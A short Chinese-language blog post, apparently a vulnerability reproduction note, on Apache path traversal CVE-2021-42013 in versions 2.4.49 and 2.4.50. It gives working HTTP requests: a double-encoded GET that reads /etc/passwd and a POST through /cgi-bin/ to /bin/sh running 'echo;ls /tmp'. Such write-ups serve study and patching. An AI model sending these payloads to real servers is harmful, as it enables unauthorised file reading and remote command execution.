Apache(CVE-2021-42013)
服務器中存在/icon/目錄,并且可以訪問,我們就可以將..進行兩次url編碼,從而遍歷其他目錄,獲得服務器上的敏感資訊:系統組態檔,網站原始碼等,
如果可以呼叫cgi介面,那么我們就可以利用這個漏洞執行任意命令,
影響版本:Apache 2.4.49 和 Apache 2.4.50,不影響更早的版本,
CGI介面:可以讓web服務去執行程式代碼,并回傳到web檔案中, 可以在web服務的conf檔案中配置cgi介面的虛擬目錄,讓訪問/cgi-bin/ 就執行代碼檔案,
復現
1. 訪問存在漏洞的url,并抓包,修改訪問的檔案路徑
這里需要將 .. 進行兩次url編碼
GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
GET /icons/../../../../etc/passwd HTTP/1.1
2. 呼叫cgi介面,執行任意命令,
這里需要將請求方法轉換為POST,使用 /bin/sh ,來執行請求體中的命令,
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1 Host: 123.58.236.76:37979 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT If-None-Match: "2d-432a5e4a73a80" Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 12 echo;ls /tmp
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/431016.html
標籤:其他
上一篇:“LNK2019:unresolvedexternalsymbol”錯誤解決建議
下一篇:jQuery檔案上傳